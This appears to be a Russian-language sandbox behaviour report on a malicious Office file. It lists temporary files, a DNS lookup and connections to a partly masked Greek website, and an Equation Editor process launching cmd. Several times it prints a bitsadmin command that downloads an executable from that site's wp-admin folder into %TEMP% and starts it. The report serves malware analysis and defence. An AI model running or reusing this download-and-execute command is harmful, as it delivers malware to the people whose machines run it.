Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer nE /priority foreground https://www.fi###o.com.gr/wp-admin/includes/bin_outputB9263FF.exe %TEMP%\NSa.exe && start %TEMP%\NSa.exe
- %WINDIR%\temp\cabdc3e.tmp
- %WINDIR%\temp\tardc3f.tmp
- %WINDIR%\temp\cabdb53.tmp
- %WINDIR%\temp\tardc4f.tmp
- %WINDIR%\temp\cab4df6.tmp
- %WINDIR%\temp\tar4df7.tmp
- %WINDIR%\temp\cab4f50.tmp
- %WINDIR%\temp\tar4f51.tmp
- %WINDIR%\temp\cab5328.tmp
- %WINDIR%\temp\tar5329.tmp
- %WINDIR%\temp\cab6727.tmp
- %WINDIR%\temp\tar6728.tmp
- %WINDIR%\temp\cabdc3e.tmp
- %WINDIR%\temp\tardc3f.tmp
- %WINDIR%\temp\cabdb53.tmp
- %WINDIR%\temp\tardc4f.tmp
- %WINDIR%\temp\cab4df6.tmp
- %WINDIR%\temp\tar4df7.tmp
- %WINDIR%\temp\cab4f50.tmp
- %WINDIR%\temp\tar4f51.tmp
- %WINDIR%\temp\cab5328.tmp
- %WINDIR%\temp\tar5329.tmp
- %WINDIR%\temp\cab6727.tmp
- %WINDIR%\temp\tar6728.tmp
- 'fi###o.com.gr':443
- 'fi###o.com.gr':443
- DNS ASK fi###o.com.gr
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer nE /priority foreground https://www.fi###o.com.gr/wp-admin/includes/bin_outputB9263FF.exe %TEMP%\NSa.exe && start %TEMP%\NSa.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer nE /priority foreground https://www.fi###o.com.gr/wp-admin/includes/bin_outputB9263FF.exe %TEMP%\NSa.exe